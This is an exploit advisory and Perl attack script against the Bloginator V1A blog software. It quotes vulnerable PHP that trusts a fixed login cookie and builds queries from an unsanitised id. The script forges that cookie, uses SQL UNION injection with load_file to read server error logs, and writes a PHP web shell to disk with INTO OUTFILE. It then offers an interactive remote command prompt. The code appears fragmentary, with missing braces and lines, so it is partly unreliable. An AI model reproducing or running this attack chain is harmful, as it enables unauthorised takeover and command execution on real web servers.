Bloginator version 1a SQL command injection via cookie bypass exploit.
Author = FireShot , Jacopo Vuga.
Thx to = Osirys for develop the Exploitation Code with me
Mail = fireshot<at>autistici<dot>org / osirys<at>autistici<dot>org
Vulnerability = SQL Command Injection (mq = off)
Software = Bloginator V1A
Download =
Greets to = Myral, str0ke
global $name,$password,$returnLink;
$p_name = strip_tags(substr($_POST['name'],0,32));
$p_password = strip_tags(substr($_POST['password'],0,32));
if(crypt($p_name , $name) == $name and crypt($p_password,$password) == $password )
setcookie("identifyYourself","you are identified");
print "Login successfull<br>";
print $returnLink;
else {print "Wrong username or password";
$action = @$_GET['action'];
$id = $_GET['id'];
function editArticle($id,$message)
global $returnLink;
$query = "select * FROM articles WHERE id='$id'";
$sql = mysql_query($query) or die(mysql_query());
$title = mysql_result($sql,0,'title');
$title = htmlentities($title);
$article = mysql_result($sql,0,'article');
$article = htmlentities($article);
$link = mysql_result($sql,0,'link');
$link = htmlentities($link);
startHTML("Edit ID # ".$id);
use IO::Socket;
use LWP::UserAgent;
my $host = $ARGV[0];
my $rand = int(rand 9) +1;
my @error_logs = qw(
my $php_c0de = "<?php echo \"st4rt\";system(\$_GET[cmd]);?>";
($host) || help("-1");
cheek($host) == 1 || help("-2");
$datas = get_input($host);
$datas =~ /(.*) (.*)/;
($h0st,$path) = ($1,$2);
print "[*] Generating error through GET request ..\n";
print "[*] Cheeking Apache Error Log path ..\n";
while (($log = <@error_logs>)&&($gotcha != 1)) {
my $regexp = "File does not exist: (.+)\/osirys_log_test$rand";
my $sql_load_file = "/articleCall.php?action=edit&id=osirys' union select 1,2,3,4,load_file('".$log."'),6,7 order by '*";
$re = sql_socket($sql_load_file,$regexp,"1");
if ($re !~ /Failed/) {
$site_path = $re;
$ok = 1;
if ($ok == 1) {
print "[*] Error Log path found -> $log\n";
print "[*] Website path found -> $site_path\n";
else {
print "[-] Couldn't file error_log !\n";
sub inj_shell {
my $attack = "/articleCall.php?action=edit&id=osirys' union select 1,2,3,4,'".$php_c0de."',6,7 into outfile '".$site_path."/1337.php";
my $regexp = "st4rt";
my $re = sql_socket($attack,$regexp,"2");
if ($re == 1) {
print "[*] Shell succesfully injected !\n";
print "[&] Hi my master, do your job now [!]\n\n";
$exec_path = $host."/1337.php";
else {
print "[-] Shell not found \n[-] Exploit failed\n\n";
sub exec_cmd {
$h0st !~ /www\./ || $h0st =~ s/www\.//;
print "shell[$h0st]\$> ";
$cmd = <STDIN>;
$cmd !~ /exit/ || die "[-] Quitting ..\n";
my $exec_path_ = $exec_path."?cmd=".$cmd;
my $re = get_req($exec_path_);
my $content = tag($re);
if ($content =~ /st4rt(.+)\*\*6/) {
my $out = $1;
$out =~ s/\$/ /g;
$out =~ s/\*/\n/g;
print "$out\n";
else {
$cmd =~ s/\n//;
print "bash: ".$cmd.": command not found\n";
$c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n";
sub sql_socket() {
my($sql,$regexp,$way) = @_;
$sql = tag_encode($sql);
my $url = $path."/".$sql;
my $data = "GET ".$url." HTTP/1.1\r\n".
"Host: ".$h0st."\r\n".
"Keep-Alive: 300\r\n".
"Connection: keep-alive\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Cookie: identifyYourself=you+are+identified;\r\n".
"Content-Length: 0\r\n\r\n".
my $socket = new IO::Socket::INET(
PeerAddr => $h0st,
PeerPort => '80',
Proto => 'tcp',
) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n";
if ($way == 1) {
while ((my $e = <$socket>)&&($stop != 1)) {
if ($e =~ /$regexp/) {
$gotcha = $1;
$stop = 1;
elsif ($way == 2) {
my $re = get_req($host."/1337.php");
if ($re =~ /st4rt/) {
$gotcha = 1;
$stop = 1;
else {
$gotcha = 0;
$stop = 0;
if ($stop == 1) {
else {
sub get_req() {
$link = $_[0];
my $req = HTTP::Request->new(GET => $link);
my $ua = LWP::UserAgent->new();
my $response = $ua->request($req);
return $response->content;
sub cheek() {
my $host = $_[0];
if ($host =~ /http:\/\/(.*)/) {
return 1;
else {
return 0;
sub get_input() {
my $host = $_[0];
$host =~ /http:\/\/(.*)/;
$s_host = $1;
$s_host =~ /([a-z.-]{1,30})\/(.*)/;
($h0st,$path) = ($1,$2);
$path =~ s/(.*)/\/$1/;
$full_det = $h0st." ".$path;
return $full_det;
sub tag() {
my $string = $_[0];
$string =~ s/ /\$/g;
$string =~ s/\s/\*/g;
sub tag_encode() {
my $sql = $_[0];
$sql =~ s/ /\%20/g;
$sql =~ s/</\%3C/g;
$sql =~ s/>/\%3E/g;
$sql =~ s/"/\%22/g;
sub banner {
print "\n".
" ---------------------------\n".
" SQL Command Injection \n".
" via Cookie Bypass \n".
" Bloginator V1A \n".
" by FireShot & Osirys \n".
" ---------------------------\n\n";
sub help() {
my $error = $_[0];
if ($error == -1) {
print "\n[-] Input data failed ! \n";
elsif ($error == -2) {
print "\n[-] Bad hostname address !\n";
print "[*] Usage : perl $0 http://hostname/cms_path\n\n";